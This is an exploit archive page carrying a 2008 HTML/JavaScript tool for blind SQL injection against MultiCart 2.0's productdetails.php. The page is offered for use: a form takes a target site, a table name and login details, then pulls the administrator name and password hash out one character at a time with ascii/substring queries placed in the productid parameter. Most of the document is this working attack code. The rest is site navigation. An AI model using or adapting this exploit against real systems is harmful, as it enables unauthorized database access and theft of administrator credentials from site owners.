multicart-blindsql.txt

multicart-blindsql.txt: Posted Feb 21, 2008; Authored by t0pp8uzz, xprog; MultiCart version 2.0 remote SQL injection exploit that leverages productdetails.php.; tags | exploit, remote, php, sql injection; SHA-256 | f43e4fa87bab20064d2c70c73750a5457113930e8a4cdb9c05b9dceb9b9362b6; Download | Favorite | View

multicart-blindsql.txt

<html>
<head>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000;  font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
<title>MultiCart 2.0 Remote SQL Injection Vulnerbility</title>
<script language="Javascript" type="text/javascript">
/*
  -------------------------------------------------------------------------------
  - MultiCart Blind SQL Injection Exploit (productdetails.php) -
  - Info ----------------------------------------------------------------------
  - SAVE AS exploit.HTML and RUN in FIREFOX -----------------
  - Author: t0pP8uZz & xprog -------------------------------------------
  - Exploit Coded By t0pP8uZz -----------------------------------------
  - Site: h4ck-y0u.org / milw0rm.com ---------------------------------
  ------------------------------------------------------------------------------
  - Needs Registration First!           ------------------------------------
  - Peace --------------------------------------------------------------------
  ------------------------------------------------------------------------------
*/

var site, user, pass, tbl, pid, res = "";

function Start() {
  
  site = document.getElementById("site").value;
  user = document.getElementById("user").value;
  pass = document.getElementById("pass").value;
  tbl  = document.getElementById("tbl").value;
  pid  = document.getElementById("pid").value;
  
  Login();
  Main(1, 48);
}

function Main(substr, num) {

  var url = site+"/productdetails.php?productid="+pid+"%20and%20ascii(substring((SELECT concat(admin_name,0x3a,admin_password) FROM "+tbl+"),"+substr+",1))="+num+"/*";
  
  netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
  
  var xmlhttp = new XMLHttpRequest();
  
  xmlhttp.onreadystatechange = function() {
  
    if(xmlhttp.readyState == 4) {
    
      var content = xmlhttp.responseText;
      if(content.match(/doesn't exist/i)) { alert("Table '"+tbl+"' Doesnt Exist! Try Another.."); return false; }
      
      var ele = document.getElementById("output");
      if(!content.match(/SQL syntax/i)) { res += String.fromCharCode((num)); ele.value = res; num = 48; substr++; }
      else { if(num == 59) { num = 96; } else { num++; }}
      
      if(res.match(":")) { 
        var check = res.split(":");
        if(check[1].length >= 32) { alert("Site Exploited! Admin Details: "+res); return true;}
      }
      Main(substr, num);
    }
  };
  xmlhttp.open("GET", url, true);
  xmlhttp.send(null);
};


function Login() {

  var data = 'txtUserName='+user+'&txtPassword='+pass+'&loginbox=+';
  netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
  
  try {
    var xmlhttp = new XMLHttpRequest();
  }
  catch(e) { alert("Use Firefox!\n\n\nError: " + e.description); }
  
  xmlhttp.open("POST", site + "/index.php", true);
  
  xmlhttp.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9");
  xmlhttp.setRequestHeader("Content-Length", data.length);
  xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  
  xmlhttp.send(data);
};
</script>
</head>
<body>
<p class="style1">- MultiCart 2.0 Remote Blind SQL Injection Vulnerbility -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to multicart site ie: http://www.site.com/multicart)</p>
<p class="style2">Table: <input type="text" id="tbl" /> (settings table name, default: "multicart_settings" others used: "mc_settings", "settings")</p>
<p class="style2">User: <input type="text" id="user" /> (Register on the site first, then enter username here)</p>
<p class="style2">Pass: <input type="text" id="pass" /> (Register on the site first, then enter password here)</p>
<p class="style2">PID: <input type="text" id="pid" /> (a valid product ID)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output: <input type="text" id="output" size="100" /></p>
<p class="style2">Notes: MultiCart uses the MD5 algorithms, The admin login is at /admin/</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>

Top Authors In Last 30 Days

Red Hat 227 files
Ubuntu 94 files
Gentoo 29 files
Debian 21 files
tmrswrr 9 files
Sina Kheirkhah 7 files
bRpsd 4 files
Amit Roy 4 files
nu11secur1ty 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,075)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,529)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,299)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,236)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,642)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

multicart-blindsql.txt

multicart-blindsql.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

multicart-blindsql.txt

Share This

multicart-blindsql.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems